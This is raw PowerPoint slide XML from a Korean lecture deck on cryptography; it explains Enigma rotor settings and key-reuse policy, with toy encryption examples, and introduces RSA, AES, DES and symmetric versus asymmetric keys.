              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>회전자의 초기 위치 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>) * ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>개 회전자의 배열 순서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>) * ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>배선반</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 연결 방식 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="손그림 일러스트 강좌: 책 그리기 - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5372537D-DD59-416A-A242-C80E31CC4A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319" t="26767" r="19159" b="19668"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2131941" y="2992014"/>
            <a:ext cx="818984" cy="543636"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DFC0060-A5CA-4B41-A333-4D90DB10F95A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690397" y="2955537"/>
            <a:ext cx="818984" cy="580113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="직선 화살표 연결선 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30CFC10B-BA81-496E-98D3-0502971B7310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3062244" y="3268089"/>
            <a:ext cx="508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8A62179-03BD-4BB0-97DA-F5A7B3880FD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193196" y="3109943"/>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a:t>날마다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>회전자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 초기 위치가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>적혀있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 책이 존재</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="직선 연결선 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E46C3A6C-5A3E-4AEF-8BC5-0FFA68992109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="796124" y="2806913"/>
            <a:ext cx="962902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F620566-0AAF-4C1E-B3B0-4D036D40EAC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3910385" y="3572477"/>
            <a:ext cx="598996" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>ABC</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045CA964-174A-478A-A982-A9838B9588CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193195" y="4037211"/>
            <a:ext cx="5152445" cy="6970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t>개인의 설정할 키를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>책에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>적혀저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 있는 키로 암호화한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>policy - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>한번 사용한 개인 설정 키는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다시 사용하지 않는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{170F9D27-A42D-43B0-A754-89332B11072C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790697" y="4216499"/>
            <a:ext cx="682487" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAVY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF40D915-D871-42C3-A85F-F7FA24E05E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3826894" y="4216498"/>
            <a:ext cx="682487" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>XYZW</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="직선 화살표 연결선 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C53E176-6752-454E-88CD-14AF31C15F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="24" idx="3"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2473184" y="4370387"/>
            <a:ext cx="135371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D9DA544-CEEF-4D80-B931-1597DD218727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886655" y="3924071"/>
            <a:ext cx="598996"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ABC</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C43A5A-BB3E-4A6E-A1FF-9E5C0A2F1256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193195" y="5257156"/>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err="1"/>
              <a:t>평문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>암호화된 개인키로 암호화한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF4B1FE0-F150-4ED6-98E5-533A5E818354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201638" y="5257156"/>
            <a:ext cx="1271545" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>IAMHUNGRY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0BFF03-8ABC-48FC-8AD5-DAD230DA6C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3826894" y="5257155"/>
            <a:ext cx="1175469" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>XHETLSPLW</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="직선 화살표 연결선 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99BF4E1B-98B1-4975-98B3-381D9B6F8EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="34" idx="3"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2473183" y="5411044"/>
            <a:ext cx="13537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120598D-3413-49A3-BF65-E09619C8149C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2889965" y="4974292"/>
            <a:ext cx="682487"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XYZW</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0F3FD9-4D7B-4D07-A3A2-375B874E039D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996065" y="5913051"/>
            <a:ext cx="10199869" cy="3755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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>결국</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>암호체계 자체는 그 당시의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>컴퓨터 환경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>에 비해 안전했으나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>가 지켜지지 않아서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>영화와 같은 크래킹이 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="직선 연결선 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2549FB69-D6A3-4B17-BED9-F3A169DE1E7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775582" y="5670708"/>
            <a:ext cx="9629029"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B2707639-B08B-4B8D-BD2C-3DB0EB143B3B}"/>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02B54A3-BA41-4FC9-A297-36118E52122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F326911F-9A15-4A43-8FC4-2DDA29B3BF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0" name="화살표: 오른쪽 29">
              <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{248AA6E2-B8D7-4AFD-BF1F-D371EBF8D4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1" name="화살표: 오른쪽 30">
            <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DD32415-C5D7-479E-ACC1-08BD02A66F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2224351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kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>현대</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>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887040321"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3693381" y="2564266"/>
          <a:ext cx="3959749" cy="1968311"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="943933">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3015816">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RSA</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AES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DES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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Block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Block </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암호</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="화살표: 오른쪽 7">
            <a:hlinkClick r:id="rId4"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89A459D-8656-471C-8EAF-C9B33442A6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AFCF6C04-E289-4CB6-938F-D904463086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A9BA884-5252-4ECE-822C-F35A68038E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2BBF4E15-D0CF-4CBB-BF32-305235FBDB0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798491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3380142718"/>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암호 기술 실습</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600" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>• RSA </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>제작 및 최적화</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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RSA </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>제작 실습 및 최적화 방법 소개</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현대암호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267321951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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>비대칭키</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F752891A-12E4-42A2-8EE5-FAD7E43B7C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758307" y="1950142"/>
            <a:ext cx="1208314" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{577D6702-CFF7-401E-8A79-444745396055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2086848" y="1950142"/>
            <a:ext cx="8018301" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
